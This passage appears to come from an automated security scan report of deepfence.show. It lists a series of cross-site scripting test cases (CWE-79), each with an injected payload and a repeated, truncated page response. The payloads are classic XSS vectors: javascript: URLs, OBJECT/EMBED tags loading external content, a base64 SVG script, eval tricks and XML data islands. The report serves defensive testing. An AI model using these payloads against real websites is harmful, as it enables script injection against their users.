src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #196\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE\n>Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #197\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE>.XSS{background-image:url(\"javascript:alert('XSS'\n)\");}</STYLE><A CLASS=XSS></A>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79Issue Number #198\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE type=\"text/css\">BODY{background:url(\"javascript\n:alert('XSS')\")}</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #199\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![\nendif]-->\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #200\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <BASE HREF=\"javascript:alert('XSS');//\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #201\nScan Cross Site ScriptingSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://soapui.org\n/scriptlet.html\"></OBJECT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #202\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-\n0080c744f389><param name=url value=javascript:alert('XSS'\n)></OBJECT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #203\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <EMBED SRC=\"http://soapui.org/xss.swf\" \nAllowScriptAccess=\"always\"></EMBED>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #204\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH \nA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv \nMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs \naW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw\nIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh \nTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"\nalways\"></EMBED>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head\n/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window._\n_DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk \nWidget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/\nekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End \nof Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" \ntype=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZ\nVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIk\niLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints on \nyour systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be demouser@deepfence.io \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #205\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io a=\"get\";b=\"URL(\\\"\";c=\"javascript:\";d=\"alert('XSS');\\\")\";eval(\na+b+c+d);\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #206\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]] ><![CDATA[\ncript:alert('XSS');\">]] ></C></X></xml><SPAN DATASRC=#I \nDATAFLD=C DATAFORMATAS=HTML></SPAN>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #207\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.io<XML ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:alert('\nXSS')\"&gt;</B></I></XML><SPAN DATASRC=\"#xss\" \nDATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #208\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:\nschemas-microsoft-com:time\"><?import namespace=\"t\" \nimplementation=\"#default#time2\"><t:set attributeName=\"\ninnerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&\nquot;)&lt;/SCRIPT&gt;\"></BODY></HTML>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 